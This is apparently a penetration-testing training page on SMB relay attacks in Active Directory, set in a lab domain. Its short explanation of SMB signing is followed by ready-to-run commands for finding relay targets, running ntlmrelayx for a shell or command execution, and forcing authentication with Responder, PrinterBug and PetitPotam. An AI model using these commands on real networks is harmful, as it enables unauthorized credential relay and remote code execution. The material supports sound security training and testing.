Operator On The Wire
← Back to Knowledge Base
OOTW / Chapter IV - Active Directory / 02. Protocols / SMB / Techniques

SMB Relay

SMB signing decides whether classic NTLM relay to SMB is viable. If SMB signing is required on the target, NTLM relay to that SMB service fails. If signing is not required and the relayed identity is local admin, relay can become command execution.

Check signing with NetExec

nxc smb 10.10.10.0/24
nxc smb 10.10.10.0/24 -u student -p 'student'
nxc smb 10.10.10.0/24 -u student -p 'student' --gen-relay-list smb-relay-targets.txt
cat smb-relay-targets.txt

Check signing with nmap

nmap -p445 --script smb2-security-mode 10.10.10.0/24

Relay to one SMB target

ntlmrelayx.py -t smb://web01.ootw.local -smb2support -i

Connect to relay shell

nc 127.0.0.1 11000

Relay command

ntlmrelayx.py -t smb://web01.ootw.local -smb2support -c 'whoami /all'

Relay to target list

ntlmrelayx.py -tf smb-relay-targets.txt -smb2support -i

Trigger examples

sudo responder -I eth0
printerbug.py ootw.local/student:'student'@dc01.ootw.local 10.10.10.100
PetitPotam.py -d ootw.local -u student -p 'student' 10.10.10.100 10.10.10.200

Notes

  • SMB signing blocks relay to SMB, not authentication to SMB.
  • A valid password, hash, or Kerberos ticket can still authenticate normally if the account is allowed.